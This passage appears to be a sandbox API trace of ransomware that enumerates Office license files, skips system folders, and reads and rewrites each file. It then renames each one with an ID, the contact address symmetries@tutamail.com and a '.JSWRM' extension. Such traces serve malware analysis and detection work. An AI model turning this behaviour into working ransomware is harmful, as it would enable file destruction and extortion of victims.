lpWideCharStr="OneNoteR_Grace-ppd.xrm-ms", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0106.190] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0106.190] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteR_Grace-ppd.xrm-ms", cchWideChar=25, lpMultiByteStr=0x2411c8, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OneNoteR_Grace-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 25 [0106.190] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0106.190] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0106.190] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0106.190] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0106.190] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0106.190] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0106.190] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OneNoteR_Grace-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\onenoter_grace-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0106.190] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=20844) returned 1 [0106.190] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.190] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5160) returned 0x24c1d0 [0106.190] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x5160, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x5160, lpOverlapped=0x0) returned 1 [0106.193] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.193] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x5160, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x5160, lpOverlapped=0x0) returned 1 [0106.193] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0106.193] CloseHandle (hObject=0x45c) returned 1 [0106.193] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0106.193] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0106.193] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0106.193] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0106.193] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0106.194] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0106.194] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0106.194] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a330 [0106.194] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a330, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0106.194] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a330 | out: hHeap=0x1e0000) returned 1 [0106.194] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236018 [0106.194] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dcb0 [0106.194] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236018 | out: hHeap=0x1e0000) returned 1 [0106.194] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0106.194] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OneNoteR_Grace-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\onenoter_grace-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OneNoteR_Grace-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\onenoter_grace-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0106.195] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dcb0 | out: hHeap=0x1e0000) returned 1 [0106.195] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0106.195] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0106.195] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0106.195] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0106.195] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe75ce29c, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe75ce29c, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe76d9301, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d4f, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="OneNoteR_Grace-ul-oob.xrm-ms", cAlternateFileName="ONENOT~3.XRM")) returned 1 [0106.195] lstrcmpiW (lpString1="OneNoteR_Grace-ul-oob.xrm-ms", lpString2=".") returned 1 [0106.195] lstrcmpiW (lpString1="OneNoteR_Grace-ul-oob.xrm-ms", lpString2="..") returned 1 [0106.195] lstrcmpiW (lpString1="OneNoteR_Grace-ul-oob.xrm-ms", lpString2="...") returned 1 [0106.195] lstrcmpiW (lpString1="OneNoteR_Grace-ul-oob.xrm-ms", lpString2="windows") returned -1 [0106.195] lstrcmpiW (lpString1="OneNoteR_Grace-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0106.195] lstrcmpiW (lpString1="OneNoteR_Grace-ul-oob.xrm-ms", lpString2="perflogs") returned -1 [0106.195] lstrcmpiW (lpString1="OneNoteR_Grace-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0106.195] lstrcmpiW (lpString1="OneNoteR_Grace-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0106.195] lstrcmpiW (lpString1="OneNoteR_Grace-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0106.195] lstrcmpiW (lpString1="OneNoteR_Grace-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0106.195] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d578 [0106.195] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteR_Grace-ul-oob.xrm-ms", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0106.195] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f98 [0106.195] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteR_Grace-ul-oob.xrm-ms", cchWideChar=28, lpMultiByteStr=0x240f98, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OneNoteR_Grace-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 28 [0106.195] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d578 | out: hHeap=0x1e0000) returned 1 [0106.195] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0106.195] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteR_Grace-ul-oob.xrm-ms", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0106.195] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0106.195] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteR_Grace-ul-oob.xrm-ms", cchWideChar=28, lpMultiByteStr=0x2413a8, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OneNoteR_Grace-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 28 [0106.195] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0106.195] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0106.195] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0106.195] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0106.195] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0106.196] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0106.196] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OneNoteR_Grace-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\onenoter_grace-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0106.196] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11599) returned 1 [0106.196] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.196] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d40) returned 0x24c1d0 [0106.196] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d40, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d40, lpOverlapped=0x0) returned 1 [0106.198] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.198] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d40, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d40, lpOverlapped=0x0) returned 1 [0106.199] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0106.199] CloseHandle (hObject=0x45c) returned 1 [0106.199] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0106.199] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0106.199] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0106.199] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0106.199] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0106.199] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0106.199] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0106.199] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0106.199] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0106.199] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0106.199] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236a28 [0106.199] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e458 [0106.199] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236a28 | out: hHeap=0x1e0000) returned 1 [0106.199] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0106.199] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OneNoteR_Grace-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\onenoter_grace-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OneNoteR_Grace-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\onenoter_grace-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0106.200] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e458 | out: hHeap=0x1e0000) returned 1 [0106.200] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0106.200] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0106.200] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0106.200] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f98 | out: hHeap=0x1e0000) returned 1 [0106.200] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe7640926, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe7640926, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe77be149, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2993, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="OneNoteR_OEM_Perp-pl.xrm-ms", cAlternateFileName="ONENOT~4.XRM")) returned 1 [0106.200] lstrcmpiW (lpString1="OneNoteR_OEM_Perp-pl.xrm-ms", lpString2=".") returned 1 [0106.200] lstrcmpiW (lpString1="OneNoteR_OEM_Perp-pl.xrm-ms", lpString2="..") returned 1 [0106.200] lstrcmpiW (lpString1="OneNoteR_OEM_Perp-pl.xrm-ms", lpString2="...") returned 1 [0106.200] lstrcmpiW (lpString1="OneNoteR_OEM_Perp-pl.xrm-ms", lpString2="windows") returned -1 [0106.200] lstrcmpiW (lpString1="OneNoteR_OEM_Perp-pl.xrm-ms", lpString2="recovery") returned -1 [0106.200] lstrcmpiW (lpString1="OneNoteR_OEM_Perp-pl.xrm-ms", lpString2="perflogs") returned -1 [0106.200] lstrcmpiW (lpString1="OneNoteR_OEM_Perp-pl.xrm-ms", lpString2="documents and settings") returned 1 [0106.200] lstrcmpiW (lpString1="OneNoteR_OEM_Perp-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0106.200] lstrcmpiW (lpString1="OneNoteR_OEM_Perp-pl.xrm-ms", lpString2="system volume information") returned -1 [0106.200] lstrcmpiW (lpString1="OneNoteR_OEM_Perp-pl.xrm-ms", lpString2="msocache") returned 1 [0106.200] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d578 [0106.200] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteR_OEM_Perp-pl.xrm-ms", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0106.200] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0106.200] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteR_OEM_Perp-pl.xrm-ms", cchWideChar=27, lpMultiByteStr=0x241268, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OneNoteR_OEM_Perp-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 27 [0106.200] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d578 | out: hHeap=0x1e0000) returned 1 [0106.201] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d728 [0106.201] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteR_OEM_Perp-pl.xrm-ms", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0106.201] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0106.201] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteR_OEM_Perp-pl.xrm-ms", cchWideChar=27, lpMultiByteStr=0x240fe8, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OneNoteR_OEM_Perp-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 27 [0106.201] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d728 | out: hHeap=0x1e0000) returned 1 [0106.201] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0106.201] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0106.201] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0106.201] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0106.201] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0106.201] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OneNoteR_OEM_Perp-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\onenoter_oem_perp-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0106.201] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=10643) returned 1 [0106.201] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.201] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2990) returned 0x24c1d0 [0106.201] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2990, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2990, lpOverlapped=0x0) returned 1 [0106.203] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.203] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2990, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2990, lpOverlapped=0x0) returned 1 [0106.204] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0106.204] CloseHandle (hObject=0x45c) returned 1 [0106.204] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0106.204] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0106.204] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0106.204] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0106.204] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0106.204] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0106.204] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0106.204] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a300 [0106.204] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a300, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0106.204] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a300 | out: hHeap=0x1e0000) returned 1 [0106.204] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236018 [0106.204] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23ddc8 [0106.204] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236018 | out: hHeap=0x1e0000) returned 1 [0106.204] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0106.204] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OneNoteR_OEM_Perp-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\onenoter_oem_perp-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OneNoteR_OEM_Perp-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\onenoter_oem_perp-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0106.205] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ddc8 | out: hHeap=0x1e0000) returned 1 [0106.205] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0106.205] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0106.205] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0106.205] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0106.205] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe755bb57, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe755bb57, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe7666b6c, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x51a8, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="OneNoteR_OEM_Perp-ppd.xrm-ms", cAlternateFileName="ONENOT~2.XRM")) returned 1 [0106.205] lstrcmpiW (lpString1="OneNoteR_OEM_Perp-ppd.xrm-ms", lpString2=".") returned 1 [0106.205] lstrcmpiW (lpString1="OneNoteR_OEM_Perp-ppd.xrm-ms", lpString2="..") returned 1 [0106.205] lstrcmpiW (lpString1="OneNoteR_OEM_Perp-ppd.xrm-ms", lpString2="...") returned 1 [0106.205] lstrcmpiW (lpString1="OneNoteR_OEM_Perp-ppd.xrm-ms", lpString2="windows") returned -1 [0106.205] lstrcmpiW (lpString1="OneNoteR_OEM_Perp-ppd.xrm-ms", lpString2="recovery") returned -1 [0106.205] lstrcmpiW (lpString1="OneNoteR_OEM_Perp-ppd.xrm-ms", lpString2="perflogs") returned -1 [0106.205] lstrcmpiW (lpString1="OneNoteR_OEM_Perp-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0106.205] lstrcmpiW (lpString1="OneNoteR_OEM_Perp-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0106.205] lstrcmpiW (lpString1="OneNoteR_OEM_Perp-ppd.xrm-ms", lpString2="system volume information") returned -1 [0106.206] lstrcmpiW (lpString1="OneNoteR_OEM_Perp-ppd.xrm-ms", lpString2="msocache") returned 1 [0106.206] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0106.206] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteR_OEM_Perp-ppd.xrm-ms", cchWideChar=28, lpMultiByteStr=0x0, 